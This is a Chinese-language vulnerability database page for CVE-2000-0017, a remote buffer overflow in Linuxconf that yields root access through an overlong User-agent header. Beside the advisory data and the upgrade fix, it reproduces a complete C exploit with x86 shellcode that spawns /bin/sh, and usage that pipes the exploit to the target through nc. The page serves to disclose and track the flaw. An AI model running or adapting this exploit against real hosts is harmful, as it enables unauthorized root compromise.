CVE-2000-0017
CVSS10.0
发布时间 :1999-12-21 00:00:00
修订时间 :2008-09-10 15:02:19
NMCOE    

[原文]Buffer overflow in Linux linuxconf package allows remote attackers to gain root privileges via a long parameter.


[CNNVD]Linux linuxconf包缓冲区溢出漏洞(CNNVD-199912-064)

        Linux linuxconf包中存在缓冲区溢出漏洞,远程攻击者利用该漏洞通过一个长的参数获得根特权。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0017
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0017
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-064
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

Linux linuxconf包缓冲区溢出漏洞
危急 缓冲区溢出
1999-12-21 00:00:00 2005-10-20 00:00:00
远程  
        Linux linuxconf包中存在缓冲区溢出漏洞,远程攻击者利用该漏洞通过一个长的参数获得根特权。
        

- 公告与补丁

        

- 漏洞信息 (20619)

Linuxconf 1.1.6 r10 Remote Buffer Overflow Vulnerablity (EDBID:20619)
linux remote
1999-12-21 Verified
0 R00T-X
N/A [点击下载]
source: http://www.securityfocus.com/bid/2352/info

Linuxconf is a Linux configuration utility from Solucorp.

An attacker supplying excess data to the USER_AGENT field in vulnerable versions of Linuxconf. This data can overflow the relevant buffer, creating a stack overflow and, properly exploited, allowing remote execution of arbitrary code as root.

/*

  linuxconf exploit by R00T-X (c) 1999

  USER_AGENT overflow x86
  should work on all linux's but you need to have
  network access to linuxconf

  greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P

  have fun with this but for EDUCATIONAL PURPOSES :)

  Usage:   (./linexp <offset>;cat)| nc targethost 98

 */

char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
"\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
"\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xe8\xc0\xff\xff\xff/bin/sh\x00";

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 1025
#define NOP 0x90

void
main (int argc, char *argv[])
{
  char buf[BUFLEN];
  int offset,nop,i;
  unsigned long esp;
  char shell[1024+300];

  if(argc < 2)
  {
  fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98\n", argv[0]);
  exit(0);
  }

  nop = 511;
  esp = 0xefbfd5e8;
  offset = atoi(argv[1]);

  memset(buf, NOP, BUFLEN);
  memcpy(buf+(long)nop, shell, strlen(shell));

  for (i = 256; i < BUFLEN - 3; i += 2)
{    *((int *) &buf[i]) = esp + (long) offset;
     shell[ sizeof(shell)-1 ] = 0;
}

 printf("POST / HTTP/1.0\r\nContent-Length: %d, User-agent: \r\n", BUFLEN);
  for (i = 0; i < BUFLEN; i++)
    putchar(buf[i]);

  printf("\r\n");

  return;
}

		

- 漏洞信息

107
Linuxconf Long Parameter Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow may exists in Linuxconf. The issue is due to the handling of HTTP headers resulting in a buffer overflow. When the Web administration mode is enabled, a remote attacker could send an overly long parameter to the USER_AGENT field, which may allow arbitrary code execution reulting in a loss of integrity.

- 时间线

1999-12-21 Unknow
1999-12-21 Unknow

- 解决方案

Upgrade to version 1.11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站